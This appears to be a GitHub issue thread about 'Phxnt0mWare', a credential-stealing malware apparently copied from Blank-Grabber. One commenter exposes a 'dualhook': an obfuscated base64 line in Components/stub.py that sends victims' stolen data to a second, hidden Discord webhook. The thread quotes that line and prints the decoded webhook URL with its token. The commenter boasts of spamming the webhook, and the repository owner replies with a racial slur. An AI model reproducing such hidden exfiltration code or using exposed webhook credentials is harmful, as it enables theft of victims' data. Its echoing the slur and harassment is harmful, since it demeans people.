### ISSUE TITLE
update ur dualhook bb 😩

### ISSUE THREAD

**Issue by noahmajors** [Phxnt0mWare/Phxnt0mWare#2]
aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTE1MTQ4NDY5MzUyMzQ2ODM3OS80T205N3BfSlJVaHplM0FaLUNpZkRvQmZ3LTZwUElYeExSblo0d2hfOGJULVFnR1dkeThjeDBnTDBSQ2dIZHc2Y0Q0UA==

hope u enjoyed the lil webhook spam from your truly.

for anyone who is actively using this, dont. use Blank-Grabber, which is the free, singlehooked version that this was skidded from.

**Comment by Phxnt0mWare** [comment]
dumb ass nigga whers the dualhooke you  moron

**Comment by noahmajors** [comment]
Components/stub.py

Line 24:     C2 = (0, base64.b64decode('aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTE1MTQ4NDY5MzUyMzQ2ODM3OS80T205N3BfSlJVaHplM0FaLUNpZkRvQmZ3LTZwUElYeExSblo0d2hfOGJULVFnR1dkeThjeDBnTDBSQ2dIZHc2Y0Q0UA==').decode())

**Comment by noahmajors** [comment]
base64 encoded webhook which translates to this when decoded...
https://discord.com/api/webhooks/1151484693523468379/4Om97p_JRUhze3AZ-CifDoBfw-6pPIXxLRnZ4wh_8bT-QgGWdy8cx0gL0RCgHdw6cD4P

**Comment by noahmajors** [comment]
also answer my dms @lil banana 😩

**Comment by noahmajors** [comment]
awe looks like your webhook expired😎

I’ll check for any updates on here so I can grab your new one
